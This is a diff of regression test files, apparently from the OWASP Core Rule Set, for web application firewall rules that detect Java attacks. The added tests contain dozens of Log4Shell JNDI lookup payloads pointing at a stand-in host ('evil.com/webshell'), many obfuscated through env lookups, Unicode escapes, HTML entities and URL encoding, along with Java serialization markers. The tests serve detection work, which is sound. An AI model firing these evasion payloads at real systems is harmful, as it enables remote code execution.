as 944151. +meta: + author: "dune73, Max Leske" + enabled: true + name: "944151.yaml" + description: "Description" +tests: + - test_title: 944151-1 + desc: Log4J exploit on arg foo + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=${jndi:ldap://evil.com/webshell} + output: + log_contains: id "944151" + - test_title: 944151-2 + desc: Log4J exploit on User-Agent + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests ${jndi:ldap://evil.com/webshell} + method: GET + port: 80 + uri: / + output: + log_contains: id "944151" + - test_title: 944151-3 + desc: Log4J exploit in XML code + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/xml + method: POST + port: 80 + uri: / + data: + output: + log_contains: id "944151" + - test_title: 944151-4 + desc: Log4J exploit in XML code + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/xml + method: POST + port: 80 + uri: / + data: "${jndi:ldap://evil.com/webshell}" + output: + log_contains: id "944151" + - test_title: 944151-5 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + output: + log_contains: id "944151" + - test_title: 944151-6 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + output: + log_contains: id "944151" + - test_title: 944151-7 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + output: + log_contains: id "944151" + - test_title: 944151-8 + desc: Log4J exploit on arg foo, with Unicode escape encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + output: + log_contains: id "944151" + - test_title: 944151-9 + desc: Log4J exploit on JSON with URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944151" + - test_title: 944151-10 + desc: Log4J exploit on JSON with Unicode escape evasion, uppercase + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-11 + desc: Log4J exploit on JSON with Unicode escape evasion, lowercase + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-12 + desc: Log4J exploit on JSON with named HTML entity evasion, lower case + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-13 + desc: Log4J exploit on JSON with named HTML entity evasion, upper case + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-14 + desc: Log4J exploit on JSON with numeric HTML entity evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-15 + desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944151" + - test_title: 944151-16 + desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944151" + - test_title: 944151-17 + desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944151" + - test_title: 944151-18 + desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944151" + - test_title: 944151-19 + desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944151" + - test_title: 944151-20 + desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-21 + desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-22 + desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-23 + desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: / + output: + log_contains: id "944151" + - test_title: 944151-24 + desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-25 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} + output: + log_contains: id "944151" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml new file mode 100644 index 0000000000..44bc144008 --- /dev/null +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml @@ -0,0 +1,448 @@ +--- +# NOTE: Please keep these tests in sync with 944152.yaml and 944151.yaml. +# 944152 should detect the same things as 944152 and 944151. +meta: + author: "dune73, Max Leske" + enabled: true + name: "944152.yaml" + description: "Description" +tests: + - test_title: 944152-1 + desc: Log4J exploit on arg foo + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=${jndi:ldap://evil.com/webshell} + output: + log_contains: id "944152" + - test_title: 944152-2 + desc: Log4J exploit on User-Agent + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests ${jndi:ldap://evil.com/webshell} + method: GET + port: 80 + uri: / + output: + log_contains: id "944152" + - test_title: 944152-3 + desc: Log4J exploit in XML code + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/xml + method: POST + port: 80 + uri: / + data: + output: + log_contains: id "944152" + - test_title: 944152-4 + desc: Log4J exploit in XML code + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/xml + method: POST + port: 80 + uri: / + data: "${jndi:ldap://evil.com/webshell}" + output: + log_contains: id "944152" + - test_title: 944152-5 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + output: + log_contains: id "944152" + - test_title: 944152-6 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + output: + log_contains: id "944152" + - test_title: 944152-7 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + output: + log_contains: id "944152" + - test_title: 944152-8 + desc: Log4J exploit on arg foo, with Unicode escape encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + output: + log_contains: id "944152" + - test_title: 944152-9 + desc: Log4J exploit on JSON with URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944152" + - test_title: 944152-10 + desc: Log4J exploit on JSON with Unicode escape evasion, uppercase + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-11 + desc: Log4J exploit on JSON with Unicode escape evasion, lowercase + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-12 + desc: Log4J exploit on JSON with named HTML entity evasion, lower case + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-13 + desc: Log4J exploit on JSON with named HTML entity evasion, upper case + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-14 + desc: Log4J exploit on JSON with numeric HTML entity evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-15 + desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944152" + - test_title: 944152-16 + desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944152" + - test_title: 944152-17 + desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944152" + - test_title: 944152-18 + desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944152" + - test_title: 944152-19 + desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944152" + - test_title: 944152-20 + desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-21 + desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-22 + desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-23 + desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: / + output: + log_contains: id "944152" + - test_title: 944152-24 + desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-25 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} + output: + log_contains: id "944152" + - test_title: 944152-26 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026lbracesomethingnotcoveredbyotherrules"}' + output: + log_contains: id "944152" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml index bd74d0a22c..288c536ec7 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml @@ -1,34 +1,17 @@ --- - meta: - author: "spartantri" - enabled: true - name: "944200.yaml" - description: "Description" - tests: - - - - test_title: 944200-0FP - desc: Argument test includes java serialization magic bytes, raw request - stages: - - - stage: - input: - stop_magic: true - dest_addr: "127.0.0.1" - port: 80 - raw_request: "POST / HTTP/1.0\r\nHost: localhost\r\nUser-Agent: ModSecurity CRS 3 Tests\r\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nAccept-Encoding: gzip,deflate\r\nAccept-Language: en-us,en;q=0.5\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 9\r\n\r\ntest=\xac\xed\x00\x05\r\n\r\n" - output: - no_log_contains: "id \"944200\"" - - - - test_title: 944200-1 - desc: Argument test includes java serialization magic bytes, base64 encoded request - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - encoded_request: "UE9TVCAvIEhUVFAvMS4wDQpIb3N0OiBsb2NhbGhvc3QNClVzZXItQWdlbnQ6IE1vZFNlY3VyaXR5IENSUyAzIFRlc3RzDQpBY2NlcHQ6IHRleHQveG1sLGFwcGxpY2F0aW9uL3htbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsdGV4dC9odG1sO3E9MC45LHRleHQvcGxhaW47cT0wLjgsaW1hZ2UvcG5nLCovKjtxPTAuNQ0KQWNjZXB0LUNoYXJzZXQ6IElTTy04ODU5LTEsdXRmLTg7cT0wLjcsKjtxPTAuNw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLGRlZmxhdGUNCkFjY2VwdC1MYW5ndWFnZTogZW4tdXMsZW47cT0wLjUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogOQ0KDQp0ZXN0PaztAAUNCg0K" - output: - log_contains: "id \"944200\"" +meta: + author: "spartantri" + enabled: true + name: "944200.yaml" + description: "Description" +tests: + - test_title: 944200-1 + desc: Argument test includes java serialization magic bytes, base64 encoded request + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + encoded_request: "UE9TVCAvIEhUVFAvMS4wDQpIb3N0OiBsb2NhbGhvc3QNClVzZXItQWdlbnQ6IE9XQVNQIE1vZFNlY3VyaXR5IENvcmUgUnVsZSBTZXQNCkFjY2VwdDogdGV4dC94bWwsYXBwbGljYXRpb24veG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCx0ZXh0L2h0bWw7cT0wLjksdGV4dC9wbGFpbjtxPTAuOCxpbWFnZS9wbmcsKi8qO3E9MC41DQpBY2NlcHQtQ2hhcnNldDogSVNPLTg4NTktMSx1dGYtODtxPTAuNywqO3E9MC43DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsZGVmbGF0ZQ0KQWNjZXB0LUxhbmd1YWdlOiBlbi11cyxlbjtxPTAuNQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiA5DQoNCnRlc3Q9rO0ABQ0KDQo=" + output: + log_contains: "id \"944200\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml index e89d782004..136522c042 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml @@ -1,1186 +1,1057 @@ --- - meta: - author: "spartantri" - enabled: true - name: "944210.yaml" - description: "Positive tests for rule 944210" - tests: - - - test_title: 944210-0 - desc: "Argument test includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=rO0ABQ" - output: - log_contains: "id \"944210\"" +meta: + author: "spartantri" + enabled: true + name: "944210.yaml" + description: "Positive tests for rule 944210" +tests: + - test_title: 944210-1 + desc: "Argument test includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-2 + desc: "Argument name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "rO0ABQ=test" + output: + log_contains: "id \"944210\"" + - test_title: 944210-3 + desc: "Cookie test includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=rO0ABQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-4 + desc: "Cookie name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: rO0ABQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-5 + desc: "Request header test includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: rO0ABQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-6 + desc: "XML element includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-7 + desc: "XML attribute name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-8 + desc: "XML attribute value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-9 + desc: "XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 